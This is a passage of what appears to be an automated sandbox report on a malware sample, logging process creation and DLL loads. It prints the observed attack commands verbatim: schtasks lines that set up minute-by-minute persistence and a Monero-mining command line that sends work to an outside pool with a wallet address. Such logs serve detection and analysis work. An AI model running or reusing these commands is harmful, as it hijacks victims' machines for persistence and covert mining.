                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe  Process created: C:\ProgramData\yDd3OJXsNQptgFrYILoygXLs.exe "C:\ProgramData\yDd3OJXsNQptgFrYILoygXLs.exe"
                            Source: unknown  Process created: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exe "C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exe"
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe  Process created: C:\ProgramData\xpTljBOh8s4KWiGtXsL1c00g.exe "C:\ProgramData\xpTljBOh8s4KWiGtXsL1c00g.exe"
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe  Process created: C:\Users\user\AppData\Local\Temp\gtxkvh.exe "C:\Users\user\AppData\Local\Temp\gtxkvh.exe"
                            Source: unknown  Process created: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exe "C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exe"
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe  Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o xmr-eu1.nanopool.org:10300 -u 45dXYsg6JEFipo688i2DkJFNBPbGZCjXpMYLRn8TRMpsYQH37gdzKMeHPjXrvfXAbZF32ifsRRLqEKoA1zsiskRJNyJydQG.Homeserver2 -p x --algo rx/0 --cpu-max-threads-hint=50 (logged twice)
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe  Process created: C:\ProgramData\oZolmRBaYFkuutSgcOrBLSAQ.exe "C:\ProgramData\oZolmRBaYFkuutSgcOrBLSAQ.exe"
                            Source: unknown  Process created: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exe "C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exe"
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe  Process created: C:\ProgramData\V6uPDVniSnRMWuLn5U9T3TGJ.exe "C:\ProgramData\V6uPDVniSnRMWuLn5U9T3TGJ.exe"
                            Source: unknown  Process created: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exe "C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exe"
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe  Process created: C:\ProgramData\2TUSzbAUfKRfcjcMzfoV1qdi.exe "C:\ProgramData\2TUSzbAUfKRfcjcMzfoV1qdi.exe"
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe  Process created: C:\ProgramData\ixjnzi95HfqR77bieLYCT4aJ.exe "C:\ProgramData\ixjnzi95HfqR77bieLYCT4aJ.exe"
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe  Process created: C:\ProgramData\6pkNzPZrIkyPzGNsokLQ8aZR.exe "C:\ProgramData\6pkNzPZrIkyPzGNsokLQ8aZR.exe"
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe  Process created: C:\ProgramData\hQdOgl4rhYQYx3G5aYY61LEd.exe "C:\ProgramData\hQdOgl4rhYQYx3G5aYY61LEd.exe"
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe  Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe /Create /SC MINUTE /MO 1 /TN Cerker.exe /TR "C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe" /F
                            Source: C:\Windows\SysWOW64\schtasks.exe  Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: unknown  Process created: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe  Process created: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe "C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe"
                            Source: unknown  Process created: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe "C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe"
                            Source: unknown  Process created: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe "C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe"
                            Source: C:\Users\user\Desktop\RPHbzz3JqY.exe  Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe /Create /SC MINUTE /MO 1 /TN explert.exe /TR "C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe" /F
                            Source: C:\Users\user\Desktop\RPHbzz3JqY.exeProcess created: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe "C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe" Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe /Create /SC MINUTE /MO 1 /TN explert.exe /TR "C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe" /FJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeProcess created: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe "C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe"Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeProcess created: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe "C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe"Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeProcess created: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe "C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe"Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeProcess created: C:\ProgramData\ix4A2DreBBsQwY6YHkidcDjo.exe "C:\ProgramData\ix4A2DreBBsQwY6YHkidcDjo.exe"Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeProcess created: C:\ProgramData\YAPNXRPmcarcR4ZDgC81Tbdk.exe "C:\ProgramData\YAPNXRPmcarcR4ZDgC81Tbdk.exe"Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeProcess created: C:\ProgramData\SmLAztxc1o8yfogkJXrRjbDt.exe "C:\ProgramData\SmLAztxc1o8yfogkJXrRjbDt.exe"Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeProcess created: C:\ProgramData\6KZmcK8r6beUzmRf6Ci6nx8d.exe "C:\ProgramData\6KZmcK8r6beUzmRf6Ci6nx8d.exe"Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeProcess created: C:\ProgramData\yDd3OJXsNQptgFrYILoygXLs.exe "C:\ProgramData\yDd3OJXsNQptgFrYILoygXLs.exe"Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeProcess created: C:\ProgramData\xpTljBOh8s4KWiGtXsL1c00g.exe "C:\ProgramData\xpTljBOh8s4KWiGtXsL1c00g.exe"Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeProcess created: C:\ProgramData\oZolmRBaYFkuutSgcOrBLSAQ.exe "C:\ProgramData\oZolmRBaYFkuutSgcOrBLSAQ.exe"Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeProcess created: C:\ProgramData\V6uPDVniSnRMWuLn5U9T3TGJ.exe "C:\ProgramData\V6uPDVniSnRMWuLn5U9T3TGJ.exe"Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeProcess created: C:\ProgramData\2TUSzbAUfKRfcjcMzfoV1qdi.exe "C:\ProgramData\2TUSzbAUfKRfcjcMzfoV1qdi.exe"Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeProcess created: C:\ProgramData\ixjnzi95HfqR77bieLYCT4aJ.exe "C:\ProgramData\ixjnzi95HfqR77bieLYCT4aJ.exe"Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeProcess created: C:\ProgramData\6pkNzPZrIkyPzGNsokLQ8aZR.exe "C:\ProgramData\6pkNzPZrIkyPzGNsokLQ8aZR.exe"Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeProcess created: C:\ProgramData\hQdOgl4rhYQYx3G5aYY61LEd.exe "C:\ProgramData\hQdOgl4rhYQYx3G5aYY61LEd.exe"Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeProcess created: unknown unknownJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeProcess created: C:\Users\user\AppData\Local\Temp\gtxkvh.exe "C:\Users\user\AppData\Local\Temp\gtxkvh.exe"Jump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o xmr-eu1.nanopool.org:10300 -u 45dXYsg6JEFipo688i2DkJFNBPbGZCjXpMYLRn8TRMpsYQH37gdzKMeHPjXrvfXAbZF32ifsRRLqEKoA1zsiskRJNyJydQG.Homeserver2 -p x --algo rx/0 --cpu-max-threads-hint=50Jump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o xmr-eu1.nanopool.org:10300 -u 45dXYsg6JEFipo688i2DkJFNBPbGZCjXpMYLRn8TRMpsYQH37gdzKMeHPjXrvfXAbZF32ifsRRLqEKoA1zsiskRJNyJydQG.Homeserver2 -p x --algo rx/0 --cpu-max-threads-hint=50Jump to behavior
                            Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                            Source: C:\Users\user\AppData\Local\Temp\gtxkvh.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe /Create /SC MINUTE /MO 1 /TN Cerker.exe /TR "C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe" /F
                            Source: C:\Users\user\AppData\Local\Temp\gtxkvh.exeProcess created: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe "C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe"
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeProcess created: unknown unknown
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeProcess created: unknown unknown
Source: C:\Users\user\Desktop\RPHbzz3JqY.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\RPHbzz3JqY.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\RPHbzz3JqY.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\RPHbzz3JqY.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\RPHbzz3JqY.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\RPHbzz3JqY.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\RPHbzz3JqY.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\RPHbzz3JqY.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\RPHbzz3JqY.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\RPHbzz3JqY.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\RPHbzz3JqY.exe | Section loaded: edputil.dll
Source: C:\Users\user\Desktop\RPHbzz3JqY.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\RPHbzz3JqY.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\RPHbzz3JqY.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\RPHbzz3JqY.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\RPHbzz3JqY.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\RPHbzz3JqY.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\RPHbzz3JqY.exe | Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\RPHbzz3JqY.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\RPHbzz3JqY.exe | Section loaded: slc.dll
Source: C:\Users\user\Desktop\RPHbzz3JqY.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\RPHbzz3JqY.exe | Section loaded: sppc.dll
Source: C:\Users\user\Desktop\RPHbzz3JqY.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\RPHbzz3JqY.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: xmllite.dll
Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe | Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe | Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe | Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe | Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe | Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe | Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe | Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe | Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe | Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe | Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe | Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe | Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe | Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe | Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe | Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe | Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe | Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: xmllite.dll
Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe | Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe | Section loaded: kernel.appcore.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe | Section loaded: apphelp.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe | Section loaded: pdh.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe | Section loaded: powrprof.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe | Section loaded: cryptbase.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe | Section loaded: umpdc.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe | Section loaded: ntmarta.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe | Section loaded: perfos.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe | Section loaded: amsi.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe | Section loaded: wininet.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe | Section loaded: mscoree.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe | Section loaded: kernel.appcore.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe | Section loaded: wtsapi32.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe | Section loaded: winsta.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe | Section loaded: cryptsp.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe | Section loaded: rsaenh.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe | Section loaded: wldp.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe | Section loaded: userenv.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe | Section loaded: profapi.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe | Section loaded: windows.storage.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe | Section loaded: wbemcomn.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe | Section loaded: sspicli.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe | Section loaded: mswsock.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe | Section loaded: dnsapi.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe | Section loaded: iphlpapi.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe | Section loaded: rasadhlp.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe | Section loaded: fwpuclnt.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe | Section loaded: atiadlxx.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe | Section loaded: atiadlxy.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe | Section loaded: atiadlxy.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe | Section loaded: atiadlxy.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe | Section loaded: nvapi64.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe | Section loaded: atiadlxy.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe | Section loaded: uxtheme.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe | Section loaded: dhcpcsvc6.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe | Section loaded: dhcpcsvc.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe | Section loaded: winnsi.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe | Section loaded: rasapi32.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe | Section loaded: rasman.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe | Section loaded: rtutils.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe | Section loaded: winhttp.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe | Section loaded: atiadlxy.dll
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeSection loaded: atiadlxy.dllJump to behavior
